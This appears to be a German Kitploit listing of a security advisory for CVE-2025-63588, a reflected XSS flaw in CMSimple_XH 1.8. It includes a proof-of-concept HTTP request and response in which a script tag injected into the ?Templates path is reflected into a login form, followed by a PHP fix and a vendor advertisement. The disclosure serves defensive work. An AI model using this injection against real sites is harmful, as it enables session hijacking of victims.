Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-63588 | Kitploit
Tools/GitHubGitHub/cybercrewinc/cve-2025-63588
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHubcybercrewinc/cve-2025-63588

CVE-2025-63588

Repository anzeigen
vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-63588 Reflektierte Cross-Site-Scripting (XSS)-Schwachstelle in der Pfadbehandlung von CMSimple_XH cmsimplexh

Geschätzter CVSS v3.1: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N → 6.1 (Mittel) Zugewiesene CVE: CVE-2025-63588
Produkte: CMSimple_XH - 1.8 Hersteller: CMSimple_XH - https://www.cmsimple-xh.org/

Zusammenfassung

Eine reflektierte Cross-Site-Scripting-Schwachstelle (XSS) besteht im Parsing-Code des Front-Routers von CMSimple_XH, der dynamische, mit dem Login zusammenhängende Eingaben verarbeitet. Die Anwendung spiegelt vom Angreifer kontrollierte Daten aus der Anfrage-URI direkt in das erzeugte HTML (beispielsweise in action-Attribute von Formularen und hrefs von Ankern), ohne ordnungsgemäße Ausgabekodierung. Ein Angreifer kann eine URL erstellen, die – wenn ein Opfer sie besucht – die Ausführung beliebigen JavaScripts im Browser des Opfers im Kontext der betroffenen Website bewirkt.

Hierbei handelt es sich um eine reflektierte XSS-Schwachstelle (nicht persistent); für die Ausnutzung muss ein Opfer einem manipulierten Link folgen. Der Hersteller wurde informiert; das Problem wurde dokumentiert und die oben genannte CVE zugewiesen.

Auswirkungen

  • Clientseitige Codeausführung — beliebiges JavaScript kann im Kontext der Website ausgeführt werden.
  • Offenlegung von Informationen — Skripte können den DOM-Inhalt sowie alle clientseitig zugänglichen Cookies oder Token lesen. Wenn Sitzungscookies nicht mit HttpOnly gesetzt sind, können Sitzungstoken gestohlen werden.
  • Session-Hijacking / Identitätsübernahme — die Exfiltration von Token könnte je nach Rechten des Opfers eine Kontoübernahme ermöglichen.
  • Phishing / UI-Spoofing / erzwungene Aktionen — injizierte Skripte können gefälschte Benutzeroberflächen erzeugen, den Benutzer umleiten oder Aktionen in der Sitzung des Opfers auslösen.

Betroffene Komponente

Die Schwachstelle stammt aus dem Code des Front-Routers / der index.php (bzw. des entsprechenden Front-Controllers), der dynamische Pfadsegmente parst und in Seiten- bzw. Vorlagenvariablen überführt. Rohe Pfadfragmente (das ?Templates...-Fragment, das vom Router von CMSimple_XH verwendet wird) werden an Seitenvorlagen übergeben und ohne ordnungsgemäße HTML-Attributkodierung oder -bereinigung in HTML-Attribute eingefügt. Dadurch können injizierte <script>-Tags oder andere Payloads unverändert gerendert werden. Ähnliche reflektierte XSS-Probleme wurden bereits für andere Webkomponenten veröffentlicht und werden häufig durch unzureichende Ausgabekodierung nicht vertrauenswürdiger Eingaben verursacht.

Proof-of-Concept (PoC)

Dieser PoC demonstriert die Spiegelung von Angreifer-Eingaben in das zurückgegebene HTML, das im Browser eines Opfers ausgeführt wird.

Anfrage:

root@kitploit:~
POST /cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9 HTTP/1.1
Host: 192.168.98.129:8080
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Origin: http://192.168.98.129:8080
Upgrade-Insecure-Requests: 1
Referer: http://192.168.98.129:8080/cmsimplexh/?Templates&login
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: "Chromium";v="138", "Not;A=Brand";v="24", "Google Chrome";v="138"
Sec-CH-UA-Platform: "Windows"
Sec-CH-UA-Mobile: ?0
Content-Length: 45

login=true&keycut=z9U%21q2k%21F0&submit=Login
Eingefügtes Bild 20251006200014

Antwort:

root@kitploit:~
HTTP/1.1 200 OK
Host: 192.168.98.129:8080
Date: Mon, 06 Oct 2025 02:50:49 GMT
Connection: close
X-Powered-By: PHP/8.3.6
Set-Cookie: XH_2f636d73696d706c6578682f=v7hkld81biddtmoua1maptd18a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<title>English Site Title – Login</title>
<meta name="robots" content="noindex">
<meta name="keywords" content="Enter list of comma separated keywords here">
<meta name="description" content="Enter website description for search engine results here">
<link rel="stylesheet" href="./assets/css/xhstyles.css" type="text/css">
<link rel="stylesheet" href="./templates/fhs-simple-2019/stylesheet.css" type="text/css">
<meta name="robots" content="noindex">
</head>
<body class="xh_login" onload="document.forms['login'].elements['keycut'].focus();">
<div class="xh_login"><h1>Login</h1><p class="xh_fail">You have entered a wrong password!</p><p><b>Site administration. Please enter password.</b></p><form id="login" name="login" action="/cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9" method="post"><input type="hidden" name="login" value="true"><input type="password" name="keycut" id="passwd" value=""> <input type="submit" name="submit" id="submit" value="Login"></form><p><a href="/cmsimplexh/?Templatesx6l81"><script>alert(1)</script>y92q9">Back</a></p> </div></body>
</html>
Eingefügtes Bild 20251006200122

Wenn der Browser eines Opfers diese Seite rendert, wird das injizierte <script>alert(1)</script> ausgeführt. Eingefügtes Bild 20251006204432 Eingefügtes Bild 20251006204517

Vorgeschlagenes PHP-Beispiel zur sicheren Ausgabe eines Aktionsattributs:

root@kitploit:~
$action_url = '/cmsimplexh/?' . rawurlencode($template_token);
echo '<form action="' . htmlspecialchars($action_url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '" method="post">';

Credits

Credits

Zugewiesene CVE:** CVE-2025-63588

https://nvd.nist.gov/vuln/detail/CVE-2025-63588

Entdecker:株式会社CyberCrew / サイバークル

Referenzen

https://github.com/cmsimple-xh/cmsimple-xh/releases https://nvd.nist.gov/vuln/detail/CVE-2025-24576


✉️ Kontakt

Wenn Sie Fragen oder Anliegen haben, zögern Sie bitte nicht, uns zu kontaktieren.


🏢 株式会社CyberCrew

G1@4x

📞 Tel: 03-6853-5823
📧 Mail:[email protected]


📄 Unternehmensübersicht

FeldInhalt
Firmenname株式会社CyberCrew
StandortAkihabara-Dai-Gebäude 6. Etage, 1-18-13 Sotokanda, Chiyoda-ku, Tokio

🔐 Hauptdienstleistungen

🛡️ Sicherheitsaudit und Risikobewertung

Wir analysieren die Schwachstellen Ihrer Organisation aus mehreren Blickwinkeln und schlagen optimale Verbesserungsmaßnahmen vor.

💻 Penetrationstests

Wir decken zielgerichtete, szenariobasierte und LLM-Pentests ab.

🌒 Dark-Web-Überwachung

Wir erkennen Lecks vertraulicher Informationen frühzeitig und reagieren schnell.

🎯 Red-Team-Übungen und Social Engineering

Wir führen Bewertungen der Verteidigungsfähigkeit auf Basis praktischer Angriffsszenarien durch.

🧠 Sicheres Systemdesign und Beratung

Wir unterstützen ein Design, das Sicherheit bereits in den frühen Entwicklungsphasen berücksichtigt.


🌐 Offizielle Website:https://www.cybercrew.co.jp
🕒 CyberCrew — Ihr vertrauenswürdiger Sicherheitspartner.

Tool herunterladen